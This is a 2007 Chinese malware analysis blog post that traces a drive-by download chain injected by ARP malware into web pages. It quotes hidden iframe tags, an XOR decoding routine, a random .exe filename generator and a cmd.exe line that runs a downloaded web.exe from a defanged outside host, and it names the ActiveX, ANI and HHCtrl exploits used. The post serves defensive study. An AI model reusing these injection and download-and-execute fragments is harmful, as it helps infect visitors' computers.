ARP病毒加的网址利用雅虎通Webcam Viewer ActiveX控件远程栈溢出漏洞传播Worm.Delf.yqz

endurer 原创
2007-06-11 第1版

今天在使用Web邮箱时，Kaspersky报告：
/---
已检测到: 恶意程序 Exploit.HTML.Ascii.o URL: hxxp://mm***.98*7**99***9.com/mm/a.htm
---/

Google搜索了一下，发现此代码是一种ARP病毒添加的。

检查发现网页都被加入了代码：
/---
＜iframe SRC="hxxp://mm***.98*7**99***9.com/abc.htm" width="1" height="1" frameborder="0"＞
＜/iframe＞
---/

hxxp://mm***.98*7**99***9.com/abc.htm 的标题为：mobile phone，内容为Service Unavailable，有迷惑性。
包含代码：
/---
＜iframe src=hxxp://mm***.98*7**99***9.com/mm/a.htm width=100 height=0＞＜/iframe＞
---/

hxxp://mm***.98*7**99***9.com/mm/a.htm 标题为：LOVE!，包含两段恶意代码。
其一是采用US-ASCII编码的字符串。

其二是代码：
/---
＜Script language="Javascript" src="hxxp://mm***.98*7**99***9.com/mm/b.js"＞＜/Script＞
---/

到 http://purpleendurer.ys168.com 下载US-ASCII编码解码程序解密后，得到一段网页代码，标题为：super IE 0Day，内容分为三个部分。

其一是javascript脚本代码，包含两个自定义函数MakeItSo()和detectOS()，MakeItSo()使用detectOS()检测浏览者电脑的Windows版本，如果是 Windows XP或Windows 2003，就打开logo.htm，否则打开banner.htm。

其二是VBScript脚本代码，功能是是创建对象 Microsoft.XMLHTTP，如果不成功就输出JavaScript脚本代码：
/---
＜SCRIPT LANGUAGE="javascript"＞window.setTimeout(""MakeItSo()"",5000);＜/script＞
---/
否则输出代码：
/---
＜iframe width="0" height="0" src="apple.htm"＞＜/iframe＞")
---/

其三是javascript脚本代码，功能是检测cookiewoshi0day是否存在，若不存在则创建，并输出代码：
/---
＜iframe width=0 height=0 src=help.htm＞＜/iframe＞
---/

hxxp://mm***.98*7**99***9.com/mm/b.js内容未加密，功能是利用ThunderServer.webThunder.1下载hxxp://www.98*7**99***9.com/web.exe，保存到c:/并运行。

文件说明符 : D:/数码相片/web.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-11 13:18:44
修改时间 : 2007-6-11 13:19:39
访问时间 : 2007-6-11 13:19:52
大小 : 18432 字节 18.0 KB
MD5 : 1c22de0a5753d9e2e9a88d65393d0a9b

Kaspersky的反应
已检测到: 木马程序 Trojan-Downloader.Win32.Delf.bjy 文件: D:/test/web.exe/PE_Patch.UPX/UPX
瑞星报为：Worm.Delf.yqz

hxxp://mm***.98*7**99***9.com/mm/logo.htm 标题为：KISS!，，包含两段恶意代码。
其一是采用US-ASCII编码的字符串。

其二是代码：
/---
＜IFRAME SRC=hxxp://mm***.98*7**99***9.com/mm/test.htm width=1 height=1 frameborder=0＞＜/IFRAME＞
---/

US-ASCII编码的字符串解码后为HTML代码，标题为：ieplorer，其中包含：
/---
＜link rel="stylesheet" href="GnYiVsAQ.CSS"＞
---/

GnYiVsAQ.CSS 的内容为：
/---
＜STYLE type=text/css＞
＜!--
body {CURSOR: url('hxxp://www.98*7**99***9.com/YuiAnLQvZx.jpg')}
--＞＜/STYLE＞
---/

YuiAnLQvZx.jpg 似乎已不存在，估计是利用ANI漏洞下载文件。

hxxp://mm***.98*7**99***9.com/mm/test.htm 利用了雅虎通Webcam Viewer ActiveX控件远程栈溢出漏洞，远程攻击者可能利用此漏洞控制用户机器。
雅虎通的Webcam Viewer（ywcvwr.dll）ActiveX控件没有正确地验证对Server属性的输入。如果用户受骗访问了恶意站点向该属性传送了超长字符串然后又调用了Receive()方式的话，就可能触发栈溢出，导致执行任意指令。
参考：hxxp://mcafeefans.com/article.asp?id=1311

hxxp://mm***.98*7**99***9.com/mm/banner.htm 标题为：Bypassing of web filters by using ASCII Exploit By CoolDiyer，内容为与hxxp://mm***.98*7**99***9.com/mm/logo.htm相的US-ASCII编码的字符串。

hxxp://mm***.98*7**99***9.com/mm/apple.htm 内容为 javascript 脚本代码，功能是使用eval()执行使用自定义函数
/---
var S=function(m){return String.fromCharCode(m^109)};
---/
解密的代码。

解密后的内容为javascript 脚本代码，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件hxxp://www.98*7**99***9.com/web.exe，保存到%windir%，文件名由自定义函数：
/---
function fk（n）｛var number ＝ Math.random（）＊n;return Math.round（number）＋'.exe';
｝
---/
生成，即***.exe，其中*为数字，再移到目录%windir%/rising***中，然后Shell.Application 对象 Q 的 ShellExecute 方法 执行命令：
%windir%/system32/cmd.exe /c %windir%/rising***/***.exe,"","open",0

hxxp://mm***.98*7**99***9.com/mm/help.htm标题为：Bypassing of web filters by using ASCII Exploit By CoolDiyer，内容为US-ASCII编码的字符串。

解码后的内容为HTML代码，标题为Bypassing of web filters by using ASCII Exploit By CoolDiyer及super IE 0Day，内容为JavaScript代码，功能是利用了IE Internet.HHCtrl ActiveX对象的拒绝服务漏洞。
受影响系统：
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Internet Explorer在未初始化URL时调用Internet.HHCtrl.1 ActiveX对象的Click()方法触发空指针引用问题，可能导致IE崩溃。
参考：
IE Internet.HHCtrl ActiveX对象中拒绝服务漏洞
http://it.rising.com.cn/Channels/Safety/LatestHole/Hole_Windows/2006-07-25/1153791365d36644.shtml